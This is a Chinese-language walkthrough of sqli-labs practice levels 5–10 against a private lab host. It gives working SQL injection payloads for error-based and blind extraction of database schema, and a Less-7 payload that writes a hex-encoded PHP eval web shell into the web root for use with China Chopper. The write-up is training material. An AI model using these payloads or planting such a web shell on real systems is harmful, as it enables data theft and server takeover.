sqli-labs靶场通关(Less5-10)

Less-5

• 键入正确的url

  http://192.168.12.129:81/sqli-labs/Less-5/?id=1
  
  # You are in...........
  # 不显示结果
  

• 尝试注入类型

  http://192.168.12.129:81/sqli-labs/Less-5/?id=1'
  
  # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
  # 可以确定为是字符型注入，通过单引号闭合
  

• 使用报错注入

  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
  
  # XPATH syntax error: '~security~'
  

• 爆库、爆表、爆字段

  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,50),0x7e),1)--+
  
  http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,50),0x7e),1)--+
  

Less-6

• 键入正确的url

  http://192.168.12.129:81/sqli-labs/Less-6/?id=1
  
  # You are in...........
  # 不显示结果
  

• 尝试注入类型

  http://192.168.12.129:81/sqli-labs/Less-5/?id=1'
  
  # You are in...........
  
  
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1"
  
  # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
  # 可以确定为是字符型注入，通过双引号闭合
  

• 使用报错注入

  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)--+
  # 或
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and extractvalue(1,concat(0x7e,database(),0x7e)) --+
  
  # XPATH syntax error: '~security~'
  

• 爆库、爆表、爆字段

  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,50),0x7e),1)--+
  
  http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,50),0x7e),1)--+
  

Less-7

• 键入正确的url

  http://192.168.12.129:81/sqli-labs/Less-7/?id=1
  
  # You are in.... Use outfile......
  # 不显示结果，提示使用outfile
  

• 尝试注入类型

  http://192.168.12.129:81/sqli-labs/Less-7/?id=1'
  
  # You have an error in your SQL syntax
  
  
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1' --+
  
  # You have an error in your SQL syntax
  
  
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1') --+
  
  # You have an error in your SQL syntax
  
  
  http://192.168.12.129:81/sqli-labs/Less-7/?id=1')) --+
  
  # You are in.... Use outfile......
  
  # 可以确定为是字符型注入，通过'))闭合
  

• 使用outfile，编写木马

  http://192.168.12.129:81/sqli-labs/Less-7/?id=1')) union select 1,2,'0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e' into outfile "/opt/lampp/htdocs/whm.php"--+
  
  # You have an error in your SQL syntax
  

• 使用中国菜刀

  • 添加url

    

  • 成功

Less-8

• 键入正确的url

  http://192.168.12.129:81/sqli-labs/Less-8/?id=1
  
  # You are in...........
  

• 尝试注入类型

  http://192.168.12.129:81/sqli-labs/Less-8/?id=1'
  
  # 没有显示
  
  
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1"
  
  # You are in...........
  
  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' --+
  
  # You are in...........
  
  # 可以确定为是字符型注入，通过'闭合
  

• 尝试时间型盲注

  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' and if(length(database())=8,sleep(3),1)--+
  
  # 页面加载大概3秒左右显示
  
  # 可以判断数据库名字长度为8
  

• 使用布尔型盲注爆破出数据库名

  http://192.168.12.129:81/sqli-labs/Less-8/?id=1' and substr(database(),1,1)='s' --+
  
  # 可使用脚本实现，爆破出数据库名
  # 爆破出可以得到数据库名为: security
  

Less-9

• 键入正确的url

  http://192.168.12.129:81/sqli-labs/Less-9/?id=1
  
  # You are in...........
  

• 尝试注入类型

  http://192.168.12.129:81/sqli-labs/Less-9/?id=1'
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1"
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1')
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1")
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1 and 1=2
  http://192.168.12.129:81/sqli-labs/Less-9/?id=-1
  
  # You are in...........
  
  # 难搞
  
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1 and sleep(3)
  
  # 依旧
  # You are in...........
  
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and sleep(3)--+
  
  # 页面加载大概3秒左右显示
  # 建议使用脚本爆破，确定'闭合
  

• 时间型盲注

  http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and if(length(database())=8,sleep(3),1)--+
  
  # 页面加载大概3秒左右显示
  
  # 可以判断数据库名字长度为8
  
  http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(3),1)--+
  
  # 可使用脚本实现，爆破出数据库名
  # 爆破出可以得到数据库名为: security
  
  

Less-10

• 键入正确的url

  http://192.168.12.129:81/sqli-labs/Less-10/?id=1
  
  # You are in...........
  

• 尝试注入类型

  http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and sleep(3)--+
  
  # 页面加载大概3秒左右显示
  # 害，不多说，和Less-9一样，建议使用脚本爆破，确定"闭合
  

• 尝试时间型盲注

  http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and if(length(database())=8,sleep(3),1)--+
  
  # 页面加载大概3秒左右显示
  
  # 可以判断数据库名字长度为8
  
  
  http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(3),1)--+
  
  # 可使用脚本实现，爆破出数据库名
  # 爆破出可以得到数据库名为: security